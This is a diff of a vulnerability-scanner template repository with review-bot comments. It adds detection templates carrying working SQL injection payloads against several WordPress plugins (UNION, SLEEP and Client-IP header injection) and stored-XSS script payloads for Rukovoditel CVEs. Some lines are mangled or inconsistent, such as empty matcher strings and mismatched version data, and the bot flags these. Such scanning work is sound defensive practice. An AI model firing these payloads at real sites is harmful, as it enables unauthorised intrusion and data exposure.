+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml
new file mode 100644
index 0000000000..ca2afd9f4f
--- /dev/null
+++ b/http/exposed-panels/qdpm-login-panel.yaml
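Review bot: The word `onmouseover=alert(document.domain)` is also present when the input is HTML-escaped (`&quot; onmouseover=alert(document.domain) y=`), so the matcher would flag a patched instance that echoes `email_create` safely; match on the breakout quote as well, e.g. `- '" onmouseover=alert(document.domain) y='`. With `ajax=true` and the `hasConfirmation` marker the response may be a JSON body in which the quote is emitted as `\"`, so check the exact reflected form on a live instance before fixing the needle. The request also posts a registration form with a random e-mail address, so note in the description whether this creates an account on the target.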
@@ -0,0 +1,35 @@
+id: qdpm-login-panel
+
+info:
+ name: qdPM Login Panel
+ author: theamanrawat
+ severity: info
+ metadata:
+ verified: "true"
+ shodan-query: http.favicon.hash:762074255
+ tags: panel,qdpm,login
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/index.php/login'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'qdPM'
+ - '/index.php/login/restorePassword'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml
new file mode 100644
index 0000000000..a4b713cde8
--- /dev/null
+++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml
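Review bot: `verified: "true"` is a quoted string here and in the three QloApps templates, while the other new templates in this patch write the bare boolean `verified: true`; pick one form so metadata filters behave consistently. The panel detection itself, requiring both `qdPM` and the `/index.php/login/restorePassword` path on an HTML 200, is specific enough for an info-severity template.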
@@ -0,0 +1,44 @@
+id: contus-video-gallery-sqli
+
+info:
+ name: WordPress Video Gallery <= 2.8 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243
+ - https://wordpress.org/plugins/photo-gallery/
+ remediation: Fixed in version 1.6.3
+ metadata:
+ verified: true
+ tags: sqli,wpscan,wordpress,contus-video-gallery,unauth
+
+variables:
+ num: '999999999'
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- -
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "c8c605999f3d8352d7bb792cf3fdb25b"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml
new file mode 100644
index 0000000000..599bc56d83
--- /dev/null
+++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml
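Review bot: The metadata is internally inconsistent: `name` declares `<= 2.8` vulnerable yet `remediation` says "Fixed in version 1.6.3", and the second reference points at `https://wordpress.org/plugins/photo-gallery/`, which is a different plugin from the Contus video gallery this template targets. Correct the fixed version and the plugin URL from the WPScan entry rather than guessing here. The payload selects `version()` into column `a19` but nothing matches on it; only the `md5({{num}})` column is checked, so drop the `version()` term so the probe extracts no more than it uses.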
@@ -0,0 +1,30 @@
+id: leaguemanager-sql-injection
+
+info:
+ name: LeagueManager <= 3.9.11 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3
+ - https://wordpress.org/plugins/leaguemanager/
+ metadata:
+ verified: true
+ tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "LeagueManagerAjaxL10n")'
+ condition: and
diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml
new file mode 100644
index 0000000000..7a6a6c809f
--- /dev/null
+++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml
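Review bot: The query string is malformed: `season=1&league_id=1season=1&league_id=1'...` glues a second `season`/`league_id` pair onto the first value with no separator, and `match_day=1&team_id=1` appears twice; PHP keeps the last duplicate so it may still work, but the injection point is obscured. Rewrite the request line as `GET /?season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1 HTTP/1.1`. The description says the sink is an AJAX action, yet the request hits the front page with query parameters; if the WPScan entry describes a different endpoint, align one with the other, and add a `remediation` line as the sibling templates do.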
@@ -0,0 +1,43 @@
+id: notificationx-sqli
+
+info:
+ name: NotificationX < 2.3.12 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
+ reference:
+ - https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
+ - https://wordpress.org/plugins/notificationx/
+ remediation: Fixed in version 2.3.12
+ metadata:
+ verified: true
+ tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection
+
+http:
+ - raw:
+ - |
+ GET /wp-json/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ @timeout: 10s
+ GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 401'
+ - 'contains(content_type, "application/json")'
+ - 'contains(body, "There is no notification created with this id")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: apikey
+ group: 1
+ regex:
+ - '"home":"(.*?)",'
+ internal: true
diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml
new file mode 100644
index 0000000000..92da0a19bf
--- /dev/null
+++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml
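Review bot: The tags use `notificationx-sql-injection` instead of a product tag `notificationx`, and omit `unauth` even though the description says unauthenticated attackers reach the endpoint; the sibling SQLi templates in this patch tag `unauth`, so align with them. The extractor captures `home` from the `/wp-json/` index, whose JSON output normally escapes slashes (`https:\/\/host`), so `{{md5('{{apikey}}')}}` would hash the escaped string unless nuclei unescapes it first; the template is marked verified, so this may be harmless, but confirm on a live target or normalise the value before hashing. The `SLEEP(6)` inside a `401` response is an unusual combination worth one comment explaining that the query runs before the key check fails, if that is what was observed.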
@@ -0,0 +1,32 @@ +id: zero-spam-sql-injection + +info: + name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability. + reference: + - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5 + - https://wordpress.org/plugins/zero-spam/ + remediation: Fixed in version 2.2.0 + metadata: + verified: true + tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth + +http: + - raw: + - | + @timeout: 10s + GET / HTTP/1.1 + Host: {{Hostname}} + Client-IP: '+(select(0)from(select(sleep(7)))v)+' + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "zerospam-js")' + condition: and From 7b99d90f2621ff88689395eaf5ebc4e4112315ba Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:32:52 +0530 Subject: [PATCH 2/7] updated tags --- cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml index 2df196adc2..cfcfd7a3bf 100644 --- a/cves/2023/CVE-2023-36346.yaml +++ b/cves/2023/CVE-2023-36346.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2023,xss,pos,codekop,unauthenticated + tags: cve,cve2023,xss,pos,codekop,unauth requests: - method: GET diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 9683b3b423..77ae78f15d 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml 
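Review bot: The match rests on `duration>=7` plus static page markers, with `@timeout: 10s` leaving only a three-second margin; a target that takes seven seconds to render its front page for unrelated reasons would be reported as injectable, and one that takes longer than ten would time out and be missed. Send a non-sleeping baseline request first and compare the two durations, or at least document the trade-off in a comment above `@timeout`. The `Client-IP` header is the injection point per the WPScan entry listed, but the description does not name it; add "via the Client-IP header" so readers do not have to infer it from the payload.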
@@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 60ffd46e2a..a532006a00 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 897d16e2e4..0b0bce72f2 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: From 7d7e4f43acb9928875999d7c1ec0073d85059e4b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:34:00 +0530 Subject: [PATCH 3/7] updated stored tags --- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/vulnerabilities/other/yeswiki-stored-xss.yaml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 6422b35447..06f833058c 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml 
@@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 36d78662c1..c540b4ae99 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b88e86034d..f6ced50538 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 6c89c80b4d..9cdb305829 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 6a91a88389..8d281bfca8 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 0cae8c42fa..29b5ad3781 100644 --- a/http/cves/2023/CVE-2023-31548.yaml 
+++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index 4327f1b5d4..68c7640bad 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -16,7 +16,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored,huntr + tags: yeswiki,xss,stored-xss,huntr http: - raw: From 9bf24ef6866b487fc15eccb7f642bc7566c00c88 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 15:45:56 +0530 Subject: [PATCH 4/7] Update CVE-2023-36346.yaml --- cves/2023/CVE-2023-36346.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml index cfcfd7a3bf..e30965bf9a 100644 --- a/cves/2023/CVE-2023-36346.yaml +++ b/cves/2023/CVE-2023-36346.yaml @@ -1,7 +1,7 @@ id: CVE-2023-36346 info: - name: POS Codekop v2.0 - Cross-site Scripting (Reflected) + name: POS Codekop v2.0 - Cross-site Scripting author: r3Y3r53 severity: medium description: | From 6469c023c4272c56aaa97e42379abd6fa337def8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:03:56 +0530 Subject: [PATCH 5/7] Update CVE-2022-44948.yaml --- http/cves/2022/CVE-2022-44948.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index df5122ae57..90fe854aef 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml 
@@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated http: - raw: - | From 993541f0aa4674604bb3ae6e4708bb91199596b8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:18:49 +0530 Subject: [PATCH 6/7] tag - update --- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 14e50a21e4..996f43445c 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2020,rukovoditel,xss,authenticated + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 8afb4901bd..a6bb6ff6d1 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index f316ac4f11..40009003ab 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml 
@@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 8712f72c85..850177753b 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index b45ddcd568..7c8ae41874 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 3e45934dcf..3487ba0aea 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index 83416143de..7c5d638e81 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 5802278e39..cdde910d64 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml 
@@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 0801892bf4..20e40fab41 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 2cb5e694f9..e489ae03bd 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index b0857fad91..4688775a8f 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 868fa826c6..581ba7e576 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: From c77309373bbb89a1d1b40ed0fb5a03132edab1ed Mon Sep 17 00:00:00 2001 
From: Dhiyaneshwaran Date: Fri, 7 Jul 2023 16:21:07 +0530 Subject: [PATCH 7/7] fix payload and directory --- http/cves/2020/CVE-2020-35987.yaml | 4 ++-- {cves => http/cves}/2022/CVE-2022-4295.yaml | 0 http/cves/2022/CVE-2022-43169.yaml | 4 ++-- http/cves/2022/CVE-2022-44948.yaml | 4 ++-- {cves => http/cves}/2023/CVE-2023-36346.yaml | 0 5 files changed, 6 insertions(+), 6 deletions(-) rename {cves => http/cves}/2022/CVE-2022-4295.yaml (100%) rename {cves => http/cves}/2023/CVE-2023-36346.yaml (100%) diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 14e50a21e4..7f9018f435 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -37,7 +37,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml similarity index 100% rename from cves/2022/CVE-2022-4295.yaml rename to http/cves/2022/CVE-2022-4295.yaml diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index b45ddcd568..bbf75cb37a 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml 
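Review bot: Switching the probe from `document.cookie` to `document.domain` is right, but the request still persists a record whose `name` is a `<script>` tag in the target's database; the template carries no `intrusive` tag and no note about the side effect, so add one or the other (the enclosing template body starts before this hunk). As rendered, the updated matcher reads `contains(body_3, "")`, an empty needle that is always true and would leave only `rukovoditel` plus a 200 as evidence; this is most likely `<script>alert(document.domain)</script>` stripped by the page rendering, so confirm the committed line carries the full tag. The POST body also shows `sort_order=0¬es=test`, which looks like `&notes=test` mangled by entity decoding in this view rather than in the file; worth checking the same way.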
@@ -36,7 +36,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 90fe854aef..a57e89e948 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -36,7 +36,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0 + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0 cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml similarity index 100% rename from cves/2023/CVE-2023-36346.yaml rename to http/cves/2023/CVE-2023-36346.yaml
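Review bot: The same concern applies to both matcher hunks here (CVE-2022-43169 and CVE-2022-44948): the new line is shown as `contains(body_3, "")`, which matches every response if the needle really is empty, so verify the committed files keep the full `<script>alert(document.domain)</script>` string and that `&notes=` was not actually committed as `¬es=`. Both payload hunks store a `<script>` payload under `name`, so these remain intrusive stored-XSS templates and should say so (tag or description); the enclosing template bodies start before these hunks.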